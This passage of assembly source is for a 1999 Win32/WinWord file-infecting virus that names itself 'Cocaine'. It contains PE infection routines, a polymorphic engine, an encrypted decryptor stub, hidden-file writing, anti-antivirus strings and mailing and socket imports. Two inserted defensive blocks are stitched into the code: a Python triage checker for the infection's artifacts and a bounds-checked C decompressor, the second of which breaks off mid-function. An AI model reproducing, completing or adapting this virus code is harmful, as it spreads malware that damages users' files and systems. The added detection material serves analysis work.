mov eax, [edi+seh_rawsz]
mov ebx, [edi+seh_rvasz]
; mov edx, [ebp+(ofs tamanho-ofs vcode)]
add eax, edx
add ebx, edx ;increase raw/virtual size
call AlignF
mov [edi+seh_rawsz], eax ;save aligned raw size
xchg eax, ebx
call AlignO ;align virtual size
cmp eax, ebx
jnb @@4 ;is below raw size?
mov eax, ebx
call AlignO ;then use raw size, realigned
@@4:
mov [edi+seh_rvasz], eax ;save aligned virtual size
mov eax, [edi+seh_rvasz] ;calculate last memory occupied
add eax, [edi+seh_rva]
call AlignO ;align
cmp eax, [esi+peh_imagesize] ;is bigger than previous one?
jb @@aa
mov [esi+peh_imagesize], eax ;if so, fix imagesize
@@aa:
call ChecksumMappedFile
mov [esi+peh_chksum], eax
push 00004000h+00008000h
push 0
push dwo [ebp+(ofs buffer1-ofs vcode)]
call [ebp+(ofs _VirtualFree-ofs vcode)]
push 00004000h+00008000h
push 0
push dwo [ebp+(ofs buffer2-ofs vcode)]
call [ebp+(ofs _VirtualFree-ofs vcode)] ;free bufferz
mov by [ebp+(ofs inf?-ofs vcode)], 0
jmp @@0
@@fux0red:
popad
jmp @@a
wavp db 'AVP Monitor',0 ;inserted in middle of code ;)
remove_seh:
sub edx, edx
pop dwo fs:[edx] ;remove frame
pop edx
ret
Infect endp
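;Added example, not part of the original source: a Python triage check for the
;on-disk artifacts the Infect routine above leaves in a PE32 file (size rounded up
;by AlignD to a multiple of DIV_VALUE, last section attributes set to
;80000000h+40000000h+00000040h, peh_reloc1/peh_reloc2 zeroed).
;Assumptions: DIV_VALUE is defined outside this section and 101 is taken from the
;";padded to 101 boundary?" comment; triage_pe and build_sample are hypothetical names.

```python
import struct

# Offsets relative to the "PE\0\0" signature, same values as the peh_*/seh_* equates.
PEH_MACHINE, PEH_NOSECTIONS, PEH_NTHEADER = 4, 6, 20
PEH_RELOC1, PEH_RELOC2 = 160, 164      # base relocation directory RVA / size (PE32)
SEH_ATTR = 36                          # section characteristics
SECTION_HEADER_SIZE = 40
DIV_VALUE = 101                        # assumption, from the source comment only
LAST_SECTION_ATTR = 0x80000000 + 0x40000000 + 0x00000040


def triage_pe(data: bytes) -> dict:
    """Report which of the three artifacts are present in an i386 PE32 image.

    Raises ValueError when the buffer is not an i386 PE32 file, because the
    fixed offsets above are only valid for that layout.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (pe,) = struct.unpack_from("<I", data, 0x3C)
    if pe + PEH_RELOC2 + 4 > len(data) or data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE header")
    (machine,) = struct.unpack_from("<H", data, pe + PEH_MACHINE)
    (magic,) = struct.unpack_from("<H", data, pe + 24)
    if machine != 0x014C or magic != 0x010B:
        raise ValueError("not an i386 PE32 image")
    (n_sections,) = struct.unpack_from("<H", data, pe + PEH_NOSECTIONS)
    (opt_size,) = struct.unpack_from("<H", data, pe + PEH_NTHEADER)
    if n_sections == 0 or opt_size < 144:   # 144 = optional header up to the reloc entry
        raise ValueError("header too small to carry a relocation directory")
    last = pe + 24 + opt_size + (n_sections - 1) * SECTION_HEADER_SIZE
    if last + SECTION_HEADER_SIZE > len(data):
        raise ValueError("section table runs past end of file")

    (attr,) = struct.unpack_from("<I", data, last + SEH_ATTR)
    reloc_rva, reloc_size = struct.unpack_from("<II", data, pe + PEH_RELOC1)
    findings = {
        "size_multiple_of_div_value": len(data) % DIV_VALUE == 0,
        "last_section_attr_match": attr == LAST_SECTION_ATTR,
        "reloc_directory_zeroed": reloc_rva == 0 and reloc_size == 0,
    }
    # Each indicator alone is common in clean files; only the combination is flagged.
    findings["suspicious"] = all(findings.values())
    return findings


def build_sample(total_size: int, last_attr: int, reloc=(0, 0)) -> bytes:
    """Constructed header-only PE32 buffer for the demo; it is not a runnable program."""
    buf = bytearray(total_size)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)              # e_lfanew
    pe = 0x40
    buf[pe:pe + 4] = b"PE\0\0"
    struct.pack_into("<HH", buf, pe + 4, 0x014C, 3)      # machine, section count
    struct.pack_into("<HH", buf, pe + 20, 224, 0x0102)   # optional header size, flags
    struct.pack_into("<H", buf, pe + 24, 0x010B)         # PE32 magic
    struct.pack_into("<II", buf, pe + PEH_RELOC1, *reloc)
    last = pe + 24 + 224 + 2 * SECTION_HEADER_SIZE       # third (last) section header
    struct.pack_into("<I", buf, last + SEH_ATTR, last_attr)
    return bytes(buf)


if __name__ == "__main__":
    samples = {
        "all three artifacts": build_sample(505, LAST_SECTION_ATTR),
        "clean-looking": build_sample(512, 0x42000040, reloc=(0x3000, 0x100)),
    }
    for name, blob in samples.items():
        print(name, triage_pe(blob))
```

;The three indicators are individually weak (stripped relocations and writable data
;sections occur in clean files), so the result is a triage flag, not a signature.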
AlignD proc
push ebp edx
mov ebp, DIV_VALUE
jmp _align
AlignD endp
AlignO proc
push ebp edx
mov ebp, [esi+56]
jmp _align
AlignO endp
AlignF proc
push ebp edx
mov ebp, [esi+60]
_align:
sub edx, edx
div ebp
test edx, edx
jz @@1
inc eax
sub edx, edx
@@1:
mul ebp
pop edx ebp
ret
AlignF endp
WriteMem proc
push 0 ;result
push ecx ;size
push esi ;buffer from
push edi ;where write
call [ebp+(ofs _GetCurrentProcess-ofs vcode)]
push eax ;handle to process
call [ebp+(ofs _WriteProcessMemory-ofs vcode)]
ret
WriteMem endp
cp_key db 0
GetList proc
lea edi, [ebp+(ofs directory-ofs vcode)]
push MAX_PATH
push edi
call [ebp+(ofs _GetSystemDirectoryA-ofs vcode)]
lea edi, [edi+eax]
call @@1
db '\BRSCBC.DAT', 0
@@1:
pop esi
@@2:
lodsb
stosb
test al, al
jnz @@2
ret
GetList endp
CheckList proc
push eax
call GetList
mov dwo [ebp+(ofs fsizel-ofs vcode)], 1*4
inc by [ebp+(ofs mf_mode-ofs vcode)]
inc by [ebp+(ofs mf_mode1-ofs vcode)]
call MapFile
mov [ebp+(ofs map@-ofs vcode)], eax
dec by [ebp+(ofs mf_mode-ofs vcode)]
dec by [ebp+(ofs mf_mode1-ofs vcode)]
mov edi, eax
test eax, eax
pop eax
jz @@1
mov ecx, [ebp+(ofs fsizel-ofs vcode)]
shr ecx, 2
repne scasd
push ecx
call UnmapFile
pop eax
@@1:
ret
CheckList endp
InsertList proc
call GetList
sub eax, eax
push eax
push 80h
push 3
push eax eax
push 0c0000000h ;read/write
lea eax, [ebp+(ofs directory-ofs vcode)]
push eax
call [ebp+(ofs _CreateFileA-ofs vcode)]
inc eax
jz @@1
dec eax
push eax
sub ecx, ecx
push 2
push ecx
push ecx
push eax
call [ebp+(ofs _SetFilePointer-ofs vcode)]
mov eax, [esp]
push 0
call @@2
dd 0
@@2:
push 4
lea ecx, [ebp+(ofs email_crc-ofs vcode)]
push ecx
push eax
call [ebp+(ofs _WriteFile-ofs vcode)]
call [ebp+(ofs _CloseHandle-ofs vcode)]
@@1:
ret
InsertList endp
ChecksumMappedFile proc
push ebp
mov ebp, esp
push esi
push ecx
push edx
xor edx, edx
mov esi, [ebp+8]
mov ecx, [ebp+12]
shr ecx, 1
@@1:
movzx eax, wo [esi]
add edx, eax
mov eax, edx
and edx, 0FFFFh
shr eax, 10h
add edx, eax
add esi, 2
loop @@1
mov eax, edx
shr eax, 10h
add ax, dx
add eax, [ebp+12]
pop edx
pop ecx
pop esi
leave
retn 8
ChecksumMappedFile endp
SearchIT proc
pushad
call sne
mov esp,[esp+8] ;fix stack
_rseh:
sub eax, eax ;signal not found
jmp rseh
sne:
sub edx, edx
push dwo fs:[edx]
mov fs:[edx], esp ;set SEH
call gpa_kernel32 ;get add for the case it is bound
mov edi, eax
mov eax, dwo [esi+128] ;import dir
push edi
call virtual2physical
pop edi
jc @@3
mov edx, eax
add edx, ebx
@@2:
cmp dwo [edx], 0
je @@3
mov eax, [edx+12] ;get module name
push edi
call virtual2physical
pop edi
jc @@0
add eax, ebx
mov ecx, 12345678h
dll_name equ dwo $-4
call strcmp
jz @@1
@@0:
add edx, 20 ;check next
jmp @@2 ;process next dir
@@3:
jmp _rseh
@@1:
mov eax, [edx+16] ;pointer to name table pointer
mov ebp, eax
push edi
call virtual2physical
pop edi
jc @@3
add eax, ebx
mov edx, esi
mov esi, eax
sub ecx, ecx
@@4:
lodsd ;load pointer to name
test eax, eax
jz @@3 ;ebx=base
inc ecx
cmp eax, edi
jz @@6
cmp eax, 077f00000h
ja @@4 ;pointing to kernel? is bound
xchg esi, edx
push edi
call virtual2physical ;edx=table esi=pe header
pop edi
jc @@3
push edi
mov edi, [esp+(7*4)+4+8] ;load requested API
push esi
lea esi, [eax+ebx+2]
dec edi
@@7:
inc edi
lodsb
test al, al
jz @@5
cmp [edi], al
je @@7
pop esi
pop edi
xchg esi, edx ;esi=table edx=pe header
jmp @@4
@@5:
pop eax
pop eax
@@6:
dec ecx
lea eax, [ebp+(ecx*4)]
rseh:
sub edx, edx
pop dwo fs:[edx] ;remove frame
pop edx
mov dwo [esp+(7*4)], eax
popad
ret
SearchIT endp
strcmp proc
push edx ebx edi
@@2:
mov bl, [eax]
cmp bl, 'a'
jb @@3
cmp bl, 'z'
ja @@3
and bl, not 20h
@@3:
cmp by [ecx], 0
jz @@1
cmp [ecx], bl
jnz @@1
inc ecx
inc eax
jmp @@2
@@1:
pop edi ebx edx
ret
strcmp endp
virtual2physical proc
push ecx esi
mov edi, esi
movzx ecx, wo [esi+20]
add edi, 24
add edi, ecx ;edi eq 1st section header
movzx ecx, wo [esi+peh_nosections]
@@0:
push eax
sub eax, [edi+12] ;sub RVA
cmp eax, [edi+8] ;pointing inside?
jb @@1
pop eax
add edi, 40 ;next section header
loop @@0
sub eax, eax
stc ;signal error
jmp @@2
@@1:
add eax, [edi+20] ;add raw pointer
pop ecx ;fix stack
@@2:
pop esi ecx ;eax=physical place
ret ;edi=section
virtual2physical endp
virtual2physical_ proc
pushad
mov esi, [ebp+(ofs pe_header-ofs vcode)]
call virtual2physical
mov [esp+(7*4)], eax
popad
ret
virtual2physical_ endp
physical2virtual_ proc
pushad
mov esi, [ebp+(ofs pe_header-ofs vcode)]
call physical2virtual
mov [esp+(7*4)], eax
popad
ret
physical2virtual_ endp
physical2virtual proc
push ecx esi
mov esi, [ebp+(ofs pe_header-ofs vcode)]
mov edi, esi
movzx ecx, wo [esi+20]
add edi, 24
add edi, ecx ;edi eq 1st section header
movzx ecx, wo [esi+peh_nosections]
@@0:
push eax
sub eax, [edi+20] ;sub physical start
cmp eax, [edi+16] ;still pointing to this section
jb @@1
pop eax
add edi, 40 ;next section header
loop @@0
sub eax, eax
stc ;signal error
jmp @@2
@@1:
add eax, [edi+12] ;add rva
pop ecx
@@2:
pop esi ecx ;eax=virtual place (rva)
ret ;edi=section
physical2virtual endp
MapFile proc
mov eax, [ebp+(ofs mm_on_off-ofs vcode)]
test eax, eax
jz @@1 ;if [mm_on_off] contains a @
clc ;treat it like a memory mapped
ret ;file
@@1:
push -1
mf_mode1 equ by $-1
pop ecx
jecxz @@212
push 80h
lea eax, [ebp+(ofs directory-ofs vcode)]
push eax
call [ebp+(ofs _SetFileAttributesA-ofs vcode)]
test eax, eax
jz error_map ;blank attributes
@@212:
sub eax, eax
push eax
push 80h
push 3
mf_mode equ by $-1
push eax eax
push 0c0000000h ;read/write
lea eax, [ebp+(ofs directory-ofs vcode)]
push eax
call [ebp+(ofs _CreateFileA-ofs vcode)]
inc eax
jz error_mapf
dec eax
mov [ebp+(ofs handle1-ofs vcode)], eax
sub ebx, ebx
cmp [ebp+(ofs fsizel-ofs vcode)], ebx
jne @@2
push ebx
push eax
call [ebp+(ofs _GetFileSize-ofs vcode)]
mov [ebp+(ofs fsizel-ofs vcode)], eax
sub edx, edx
mov ecx, DIV_VALUE
div ecx
test edx, edx
jz close_map
@@2:
sub eax, eax
push eax
push dwo [ebp+(ofs fsizel-ofs vcode)]
push eax
push 4
push eax
push dwo [ebp+(ofs handle1-ofs vcode)]
call [ebp+(ofs _CreateFileMappingA-ofs vcode)]
test eax, eax
jz close_map
mov [ebp+(ofs handle2-ofs vcode)], eax
sub eax, eax
push dwo [ebp+(ofs fsizel-ofs vcode)]
push eax eax
push 2
push dwo [ebp+(ofs handle2-ofs vcode)]
call [ebp+(ofs _MapViewOfFile-ofs vcode)]
test eax, eax
jz unmap_map
ret
MapFile endp
CheckName proc
push ebp
call _seh
mov esp,[esp+8] ;fix stack
jmp remove_seh
_seh:
sub ecx, ecx
push dwo fs:[ecx]
mov fs:[ecx], esp
cld
call delta
lea edi, [ebp+(ofs directory-ofs vcode)]
push edi
mov esi, [esp+(7*4)+(4*6)+(2*4)] ;get pointer to path name
@@1:
lodsb
cmp al, '\'
jne @@5
inc ecx ;signal slash found
@@5:
cmp al, '"'
je @@1
cmp al, "'" ;ignore these
je @@1
cmp al, 'a'
jb @@3
cmp al, 'z'
ja @@3
and al, not 20h ;make upcase
@@3:
stosb
test al, al
jnz @@1
dec edi
jecxz @@7
@@2:
mov al, by [edi-1]
cmp al, 20h
je @@8
add bl, al ;calc chksum
@@8:
dec edi
cmp al, '\' ;find backslash
jnz @@2
@@7:
mov eax, edi
pop edx
jecxz @@6
sub eax, edx
push ebx
call ProcessDir ;process directory
pop ebx
@@6:
sub edx, edx
pop dwo fs:[edx] ;remove frame
pop edx
pop ebp
ret
CheckName endp
UnmapFile proc
mov eax, [ebp+(ofs mm_on_off-ofs vcode)]
test eax, eax
jz @@1
clc
ret
@@1:
push dwo [ebp+(ofs map@-ofs vcode)]
call [ebp+(ofs _UnmapViewOfFile-ofs vcode)]
unmap_map:
push dwo [ebp+(ofs handle2-ofs vcode)]
call [ebp+(ofs _CloseHandle-ofs vcode)]
close_map:
lea eax, dwo [ebp+(ofs lw_creat_h-ofs vcode)]
push eax
sub eax, 8
push eax
sub eax, 8
push eax
push dwo [ebp+(ofs handle1-ofs vcode)]
call [ebp+(ofs _SetFileTime-ofs vcode)]
push dwo [ebp+(ofs handle1-ofs vcode)]
call [ebp+(ofs _CloseHandle-ofs vcode)]
error_mapf:
push dwo [ebp+(ofs fattr-ofs vcode)]
lea eax, [ebp+(ofs directory-ofs vcode)]
push eax
call [ebp+(ofs _SetFileAttributesA-ofs vcode)]
error_map:
sub eax, eax
ret
UnmapFile endp
random0 proc
sub eax, eax
random proc
push ecx edx
push eax
call delta
mov eax, [ebp+(ofs pseed-ofs vcode)]
mov ecx, 41c64e6dh
mul ecx
add eax, 3039h
and eax, 7ffffffh
mov [ebp+(ofs pseed-ofs vcode)], eax
pop ecx
jecxz @@3 ;limit set?
sub edx, edx
div ecx
xchg eax, edx ;value = rnd MOD limit
@@3:
mov ecx, [esp+(2*4)] ;ecx=ret address
cmp by [ecx], 0cch ;is ret address a int3?
jne @@4
jmp ebp ;if so, start to exec garbage
@@4:
pop edx ecx
sahf ;random flagz
ret
random endp
random0 endp
;name +4
;size +8
;buffer +12
WriteDump proc
sub eax, eax
push eax
push 12345678h ;hidden file
wd_att equ dwo $-4
push 2
push eax eax
push 0c0000000h ;read/write
push dwo [esp+4+(6*4)]
call [ebp+(ofs _CreateFileA-ofs vcode)]
mov ebx, eax
push 0
call @@61
dd 0
@@61:
push dwo [esp+8+(2*4)]
push dwo [esp+12+(3*4)]
push ebx
call [ebp+(ofs _WriteFile-ofs vcode)]
push ebx
call [ebp+(ofs _CloseHandle-ofs vcode)]
ret 12
WriteDump endp
FileMask db '\*.*', 0, 0, 0, 0
macro_crypt proc
pushad
mov al, 0
macro_key equ by $-1
mov ecx, ofs macro_end-ofs macro_start
lea edi, [ebp+(ofs macro_start-ofs vcode)]
@@1:
xor by [edi], al
inc edi
loop @@1
popad
ret
macro_crypt endp
CRC32 proc
cld
push ebx
mov ecx, -1
mov edx, ecx
NextByteCRC:
xor eax, eax
xor ebx, ebx
lodsb
xor al, cl
mov cl, ch
mov ch, dl
mov dl, dh
mov dh, 8
NextBitCRC:
shr bx, 1
rcr ax, 1
jnc NoCRC
xor ax, 08320h
xor bx, 0edb8h
NoCRC:
dec dh
jnz NextBitCRC
xor ecx, eax
xor edx, ebx
dec di
jnz NextByteCRC
not edx
not ecx
pop ebx
mov eax, edx
rol eax, 16
mov ax, cx
ret
CRC32 endp
OpenAncev proc
sub eax, eax
push eax
push 80h
push 3
push eax eax
push 80000000h
call @@1
ancevsys db 'C:\ANCEV.SYS', 0
@@1:
call [ebp+(ofs _CreateFileA-ofs vcode)]
inc eax
jz @@filedontexists
dec eax
push eax
call [ebp+(ofs _CloseHandle-ofs vcode)]
@@fileexists:
clc
ret
@@filedontexists:
stc
ret
OpenAncev endp
align 4
dec_end_code equ this byte
DecriptInit proc
cld
sub eax, eax
db 0b8h+5 ;mov ebp, delta
_delta dd 00403000h
lea ebx, [ebp+(ofs vinit-ofs vcode)]
push ebx
lea ebx, [ebp+(ofs dec_end_code-ofs vcode)]
push dwo fs:[eax]
mov fs:[eax], esp ;set new seh frame
mov edi, ebp
mov eax, 0
key1 equ dwo $-4
@@1:
xor [edi], eax
scasd
add eax, 12345678h
org $-4
key2 dd 0
cmp edi, ebx
jne @@1
mov eax, cs:[0] ;cause fault
DecriptInit endp
ENDIF
vend equ this byte ;END OF PHYSICAL BODY
db 'EOV', 0
align 4
k32_address equ this byte
_CreateProcessA dd 0
_CreateFileA dd 0
_WinExec dd 0
_CloseHandle dd 0 ;add here a var that hold the
_LoadLibraryA dd 0
_FreeLibrary dd 0
_CreateFileMappingA dd 0
_MapViewOfFile dd 0
_UnmapViewOfFile dd 0
_FindFirstFileA dd 0
_FindNextFileA dd 0
_FindClose dd 0
_SetEndOfFile dd 0
_VirtualAlloc dd 0
_VirtualFree dd 0
_GetSystemTime dd 0
_GetWindowsDirectoryA dd 0
_GetSystemDirectoryA dd 0
_GetCurrentDirectoryA dd 0
_SetFileAttributesA dd 0
_SetFileTime dd 0
_ExitProcess dd 0
_GetCurrentProcess dd 0
_WriteProcessMemory dd 0
_WriteFile dd 0
_DeleteFileA dd 0
_Sleep dd 0
_CreateThread dd 0
_GetFileSize dd 0
_SetFilePointer dd 0
_MessageBoxA dd 0
_FindWindowA dd 0
_PostMessageA dd 0
_RegCloseKey dd 0
_RegQueryValueEx dd 0
_RegOpenKeyEx dd 0
_RegCreateKeyEx dd 0
_RegSetValueEx dd 0
_GetModuleHandle dd 0
_GetProcAddress dd 0 ;basic api init
_connect dd 0
_recv dd 0
_MAPISendMail dd 0
old_eip dd 0 ;first entrypoint place
patch_jump dd 0 ;where last jump is(patch!!)
sRVA dd 0 ;CODE section paramz, for
RawSize dd 0 ;branch_entry
lgarble db 0 ;last garble indicator
inf? db 0 ;can infect file?
_dec dw 0 ;instruction used to decript
K32 dd 0 ;kernel32 base
U32 dd 0 ;user32 base
pseed dd 0 ;poly seed
variables dd 0
reg32 dd 0 ;table of reg used
buffer dd 0 ;current work buffer
_size dd 0 ;size to encript
entry dd 0 ;delta to entrypoint
rva dd 0 ;place in memory where virus
;will run
flagz dd 0 ;garbling flagz
c_reg dd 0 ;actual counter reg
p_reg dd 0 ;actual pointer reg
recurse dd 0 ;recursion deep
decriptor dd 0 ;start of decriptor in current
;buffer
search_handle dd 0
_socket dd 0
socket dd MAX_SOCK dup (0)
recv_size dd 0
recv_buff dd 0
email_w dd 0
thread dd 0
email db 128 dup (0)
email_crc dd 0
secz db 0
mdeep db 0
align 4
handle1 dd 0
handle2 dd 0
map@ dd 0 ;map address
tamanho dd 0 ;total added size
ep dd 0 ;new entrypoint
image_infect dd 0
OurTimer dd 0
polybuffer dd 0 ;address of buffer for poly
buffer1 dd 0 ;temporary poly bufferz
buffer2 dd 0
mm_on_off dd 0
pe_header dd 0
seed dd 0 ;main random seed
_mapi dd 0
subject dd 0
directory db MAX_PATH dup (0) ;work directory structure
lparm dd 0
lvars dd 0
subs_index dd 0
s_into db 0
_pusha db 0
fname db 32 dup (0)
align 4
current_time equ this byte
_year dw 0
_month dw 0
_dayofweek dw 0
_day dw 0
_hour dw 0
_minute dw 0
_second dw 0
_milisecond dw 0
find_data equ this byte
fattr dd 0
c_creat_h dd 0
c_creat_l dd 0
la_creat_h dd 0
la_creat_l dd 0
lw_creat_h dd 0
lw_creat_l dd 0
fsizeh dd 0
fsizel dd 0
reserved dd 0, 0
filename db 260 dup (0)
altname db 13 dup (0)
altext db 3 dup (0)
subs_table db 6*MAX_SUBROUTINES dup (0) ;dd where sub reside
;db no. of param that sub clean
;db no. of vars that sub alloc
MapiMessage struc
resd dd ?
lpszSubject dd ?
lpszNoteText dd ?
lpszMessageType dd ?
lpszDateReceived dd ?
lpszConversationID dd ?
flags dd ?
lpOriginator dd ?
nRecipCount dd ?
lpRecips dd ?
nFileCount dd ?
lpFiles dd ?
MapiMessage ends
MapiRecipDesc struc
resd dd ?
ulRecipClass dd ?
lpszName dd ?
lpszAddress dd ?
ulEIDSize dd ?
lpEntryID dd ?
MapiRecipDesc ends
MapiFileDesc struc
resd dd ?
flFlags dd ?
nPosition dd ?
lpszPathName dd ?
lpszFileName dd ?
lpFileType dd ?
MapiFileDesc ends
MF MapiFileDesc <0>
mend equ this byte
_VSEG ends
end main
;----------------------------------(HOST.INC)---------------------------------
;Generic Host
;(c) Vecna 1999
;First generation host. Just passes control to the virus and, when it gets
;control again, shows a dialog box and exits.
_TEXT segment dword use32 public'CODE'
extrn ShellAboutA:Proc
extrn ExitProcess:pRoc
;I_AM_IDIOT_USER_THAT_CANT_COMPILE EQU TRUE ;antilamer code :P
main proc
IFNDEF I_AM_IDIOT_USER_THAT_CANT_COMPILE
jmp DecriptInit
ENDIF
host:
push 0
push ofs tit
push ofs msg
push 0
call ShellAboutA
push 0
call ExitProcess
main endp
_TEXT ends
_DATA segment dword use32 public 'DATA'
tit db 'W32/Wm.Cocaine by Vecna', 0
msg db 'Cocaine - A Win32/WinWord Virus#'
db 'Cocaine - Your PC is now addicted', 0
_DATA ends
;----------------------------------(HOST.INC)---------------------------------
;-----------------------------------(LZ.INC)----------------------------------
;LZ Decompression routines
;(c) Vecna 1999
;Converted from a C source
;These routines decompress a LZ packed buffer. They were coded in C, and
;converted to ASM using BCC32 with the -S switch. Besides the normal switches
;to optimize, this was optimized by hand a bit. Virogen has on his www page
;a more optimized version of this routine, and other related material about
;compression in win32asm.
;void fast_copy(p_src,p_dst,len)
;
fast_copy proc
push edi esi ecx
mov ecx,dword ptr [esp+ 4+(4*3)]
mov edi,dword ptr [esp+ 8+(4*3)]
mov esi,dword ptr [esp+12+(4*3)]
cld
rep movsb
pop ecx esi edi
ret 12
fast_copy endp
lzrw1_decompress proc near
?live1@768:
;
; void lzrw1_decompress(p_src_first,src_len,p_dst_first,p_dst_len)
;
@27:
push ebp
mov ebp,esp
add esp,-8
push ebx
push esi
push edi
;
; /* Input : Specify input block using p_src_first and src_len. */
; /* Input : Point p_dst_first to the start of the output zone. */
; /* Input : Point p_dst_len to a ULONG to receive the output length. */
; /* Input : Input block and output zone must not overlap. User knows */
; /* Input : upperbound on output block length from earlier compression. */
; /* Input : In any case, maximum expansion possible is eight times. */
; /* Output : Length of output block written to *p_dst_len. */
; /* Output : Output block in Mem[p_dst_first..p_dst_first+*p_dst_len-1]. */
; /* Output : Writes only in Mem[p_dst_first..p_dst_first+*p_dst_len-1]. */
; UBYTE *p_src_first, *p_dst_first; ULONG src_len, *p_dst_len;
; {UWORD controlbits=0, control;
;
?live1@784: ; EDI = control, ECX = p_src_first
xor esi,esi
?live1@800: ;
mov ecx,dword ptr [ebp+20]
;
; UBYTE *p_src=p_src_first+FLAG_BYTES, *p_dst=p_dst_first,
; *p_src_post=p_src_first+src_len;
;
?live1@816: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = p_src_first
;
mov ebx,dword ptr [ebp+16]
add ebx,ecx
?live1@832: ; EDI = control, ESI = controlbits, ECX = p_src_first
mov edx,dword ptr [ebp+12]
?live1@848: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = p_src_first
;
mov dword ptr [ebp-4],ebx
?live1@864: ; EDI = control, ESI = controlbits, ECX = p_src_first
lea eax,dword ptr [ecx+4]
;
; if (*p_src_first==FLAG_COPY)
;
?live1@880: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = p_src_first
;
cmp byte ptr [ecx],1
jne short @28
;
; {fast_copy(p_src_first+FLAG_BYTES,p_dst_first,src_len-FLAG_BYTES);
;
?live1@896: ; ECX = p_src_first
add ecx,4
push ecx
mov eax,dword ptr [ebp+12]
push eax
mov edi,dword ptr [ebp+16]
sub edi,4
push edi
call fast_copy
;
; *p_dst_len=src_len-FLAG_BYTES; return;}
;
?live1@912: ; EDI = @temp14
mov eax,dword ptr [ebp+8]
mov dword ptr [eax],edi
jmp short @29
;
; while (p_src!=p_src_post)
;
?live1@928: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits
@28:
cmp eax,dword ptr [ebp-4]
je short @31
;
; {if (controlbits==0)
;
@30:
test esi,esi
jne short @32
;
; {control=*p_src++; control|=(*p_src++)<<8; controlbits=16;}
;
?live1@960: ; EAX = p_src, EDX = p_dst
movzx edi,byte ptr [eax]
inc eax
xor ecx,ecx
; mov esi,16
push 16
pop esi
mov cl,byte ptr [eax]
shl ecx,8
or edi,ecx
inc eax
;
; if (control&1)
;
?live1@976: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits
@32:
test edi,1
je short @33
; jnc short @33
;
; {UWORD offset,len; UBYTE *p;
; offset=(*p_src&0xF0)<<4; len=1+(*p_src++&0xF);
;
@34:
xor ebx,ebx
xor ecx,ecx
mov bl,byte ptr [eax]
mov cl,byte ptr [eax]
and ebx,15
inc eax
inc ebx
and ecx,240
mov dword ptr [ebp-8],ebx
;
; offset+=*p_src++&0xFF; p=p_dst-offset;
;
?live1@1008: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = offset
;
xor ebx,ebx
mov bl,byte ptr [eax]
inc eax
?live1@1024: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits
shl ecx,4
?live1@1040: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = offset
;
and ebx,255
add ecx,ebx
mov ebx,edx
sub ebx,ecx
mov ecx,ebx
jmp short @36
;
; while (len--) *p_dst++=*p++;}
;
?live1@1056: ; EAX = p_src, EDX = p_dst, ECX = p, EDI = control, ESI = controlbits
;
@35:
mov bl,byte ptr [ecx]
inc ecx
mov byte ptr [edx],bl
inc edx
@36:
mov ebx,dword ptr [ebp-8]
add dword ptr [ebp-8],-1
test ebx,ebx
jne short @35
@37:
jmp short @38
;
; else
; *p_dst++=*p_src++;
;
?live1@1072: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits
@33:
mov cl,byte ptr [eax]
inc eax
mov byte ptr [edx],cl
inc edx
;
; control>>=1; controlbits--;
;
@38:
shr edi,1
dec esi
cmp eax,dword ptr [ebp-4]
jne short @30
;
; }
; *p_dst_len=p_dst-p_dst_first;
;
?live1@1120: ; EDX = p_dst
@31:
sub edx,dword ptr [ebp+12]
mov eax,dword ptr [ebp+8]
mov dword ptr [eax],edx
;
; }
;
?live1@1136: ;
@39:
@29:
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
ret 16
lzrw1_decompress endp
;-----------------------------------(LZ.INC)----------------------------------
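;Added example, not part of the original source: a bounds-checked C rendering
;of the decompressor documented in the C comments above, for unpacking such
;buffers during static analysis. The function name, status codes and sample
;byte arrays are assumptions constructed for illustration. Unlike the routine
;above, it rejects truncated input, copy offsets that point before the start
;of the output, and output that would exceed the destination buffer.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FLAG_BYTES 4   /* header size, as in the C comments of the routine */
#define FLAG_COPY  1   /* first header byte == 1: block is stored, not packed */

enum lz_status { LZ_OK = 0, LZ_TRUNCATED = -1, LZ_BAD_OFFSET = -2, LZ_OUTPUT_FULL = -3 };

/* Constructed sample: header, control word 0x0008 (three literals, then one
   copy item), literals "abc", copy item len=6 offset=3 -> "abcabcabc". */
static const uint8_t SAMPLE_PACKED[] = { 0, 0, 0, 0, 0x08, 0x00, 'a', 'b', 'c', 0x05, 0x03 };
/* Constructed sample: stored block (FLAG_COPY) carrying "hi". */
static const uint8_t SAMPLE_STORED[] = { FLAG_COPY, 0, 0, 0, 'h', 'i' };
/* Constructed malformed input: the first item is a copy with offset 5 while
   nothing has been written yet, so it points before the output start. */
static const uint8_t SAMPLE_BAD_OFFSET[] = { 0, 0, 0, 0, 0x01, 0x00, 0x00, 0x05 };
/* Constructed malformed input: control word cut off after one byte. */
static const uint8_t SAMPLE_TRUNCATED[] = { 0, 0, 0, 0, 0x08 };

static uint8_t demo_out[64];   /* scratch output buffer for the demo */
static size_t demo_len;

int lzrw1_decompress_checked(const uint8_t *src, size_t src_len,
                             uint8_t *dst, size_t dst_cap, size_t *dst_len)
{
    size_t in = FLAG_BYTES, out = 0;
    unsigned control = 0, controlbits = 0;

    *dst_len = 0;
    if (src_len < FLAG_BYTES)
        return LZ_TRUNCATED;

    if (src[0] == FLAG_COPY) {               /* stored block: plain copy */
        size_t n = src_len - FLAG_BYTES;
        if (n > dst_cap)
            return LZ_OUTPUT_FULL;
        memcpy(dst, src + FLAG_BYTES, n);
        *dst_len = n;
        return LZ_OK;
    }

    while (in < src_len) {
        if (controlbits == 0) {              /* 16-bit little-endian control word */
            if (src_len - in < 2)
                return LZ_TRUNCATED;
            control = src[in] | ((unsigned)src[in + 1] << 8);
            controlbits = 16;
            in += 2;
        }
        if (control & 1) {                   /* copy item: two bytes */
            size_t len, offset, i;
            if (src_len - in < 2)
                return LZ_TRUNCATED;
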